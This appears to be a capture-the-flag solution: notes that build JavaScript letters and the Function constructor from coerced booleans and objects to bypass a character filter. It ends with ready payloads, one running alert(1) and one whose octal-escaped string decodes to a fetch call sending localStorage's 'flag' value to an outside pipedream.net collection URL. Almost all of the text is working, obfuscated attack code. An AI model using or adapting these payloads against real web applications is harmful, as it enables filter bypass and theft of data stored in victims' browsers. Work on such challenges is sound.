(!1+"")[1] = a
({}+"")[2] = b
({}+"")[5] = c
((""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]])+"")[27] = d
(!1+"")[4] = e
(!1+"")[0] = f
((""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]])+"")[5] = i
({}+"")[3] = j
(!1+"")[2] = l
((""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]])+"")[2] = n
({}+"")[1] = o
(!0+"")[1] = r
(!1+"")[3] = s
(!0+"")[0] = t
(!0+"")[2] = u
((""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]])+"")[22] = v


['sub'] = [(!1+"")[3]+(!0+"")[2]+({}+"")[2]]
['constructor'] = [({}+"")[5]+({}+"")[1]+((""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]])+"")[2]+(!1+"")[3]+(!0+"")[0]+(!0+"")[1]+(!0+"")[2]+({}+"")[5]+(!0+"")[0]+({}+"")[1]+(!0+"")[1]]
alert(1) = (((!1+"")[1]+(!1+"")[2]+(!1+"")[4]+(!0+"")[1]+(!0+"")[0])+("(1)"))()
fetch = \\146\\145\\164\\143\\150\\050\\047\\150\\164\\164\\160\\163\\072\\057\\057\\145\\156\\063\\154\\143\\162\\164\\062\\156\\165\\150\\060\\150\\163\\151\\056\\155\\056\\160\\151\\160\\145\\144\\162\\145\\141\\155\\056\\156\\145\\164\\057\\077\\047\\053\\154\\157\\143\\141\\154\\123\\164\\157\\162\\141\\147\\145\\056\\147\\145\\164\\111\\164\\145\\155\\050\\047\\146\\154\\141\\147\\047\\051\\051

full_alert = ""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]][({}+"")[5]+({}+"")[1]+((""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]])+"")[2]+(!1+"")[3]+(!0+"")[0]+(!0+"")[1]+(!0+"")[2]+({}+"")[5]+(!0+"")[0]+({}+"")[1]+(!0+"")[1]](((!1+"")[1]+(!1+"")[2]+(!1+"")[4]+(!0+"")[1]+(!0+"")[0])+("(1)"))()
full_exploit = ""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]][({}+"")[5]+({}+"")[1]+((""[(!1+"")[3]+(!0+"")[2]+({}+"")[2]])+"")[2]+(!1+"")[3]+(!0+"")[0]+(!0+"")[1]+(!0+"")[2]+({}+"")[5]+(!0+"")[0]+({}+"")[1]+(!0+"")[1]]("\\146\\145\\164\\143\\150\\050\\047\\150\\164\\164\\160\\163\\072\\057\\057\\145\\156\\063\\154\\143\\162\\164\\062\\156\\165\\150\\060\\150\\163\\151\\056\\155\\056\\160\\151\\160\\145\\144\\162\\145\\141\\155\\056\\156\\145\\164\\057\\077\\047\\053\\154\\157\\143\\141\\154\\123\\164\\157\\162\\141\\147\\145\\056\\147\\145\\164\\111\\164\\145\\155\\050\\047\\146\\154\\141\\147\\047\\051\\051")